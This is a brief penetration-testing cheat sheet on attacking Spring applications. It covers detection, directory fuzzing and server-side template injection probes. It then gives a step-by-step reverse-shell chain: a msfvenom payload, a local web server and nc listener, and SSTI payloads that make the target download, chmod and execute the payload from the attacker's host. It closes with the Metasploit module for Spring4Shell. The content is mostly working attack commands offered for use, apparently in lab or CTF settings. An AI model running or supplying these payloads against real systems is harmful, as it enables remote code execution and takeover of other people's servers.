Spring Pentesting

Spring is an application framework and inversion of control container for the Java platform.

- [spring4shell](https://tryhackme.com/room/spring4shell)

Framework Detection

If we get the Whitelabel Error Page, the website may use Spring Boot.


Enumeration

Directory Discovery

ffuf -u https://example.com/FUZZ -w seclists/Discovery/Web-Content/spring-boot.txt


SSTI

Discovery

If there is an input form, such as a search form, or URL parameter which the parameter is reflected in the website, you may be able to find the vulnerability to the server-side template injection.

Try them:

2*2
#{2*2}
*{2*2}

Then you can also check more about that.

{"dfd".replace("d", "x")}
#{"dfd".replace("d", "x")}
*{"dfd".replace("d", "x")}

// ---------------------------------------

// the desired output of the above...
"xfx"

Reverse Shell

First generate the payload of the reverse shell which will be downloaded from the website.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f elf > r.elf

Start a local web server to allow the website to download the payload named “r.elf”

python3 -m http.server 8000

In another terminal, open listener for getting the reverse shell.

nc -lvnp <local-port>

In the target website,

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://<local-ip>:8000/r.elf")}

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./r.elf")}

Finally we should see to get the shell.


Spring4Shell (CVE-2022-22965)

Spring4Shell is a vulnerabilitiy to remote code execution in Spring framework. It affects a component in Spring Core which is the heart of the framework.
It is identified as a bypass of the patch for CVE-2010-1622.

Exploitation

We can use Metasploit for this exploitation.

msfconsole
msf> use exploit/multi/http/spring_framework_rce_spring4shell

Alternatively, various PoCs are available in GitHub repositories.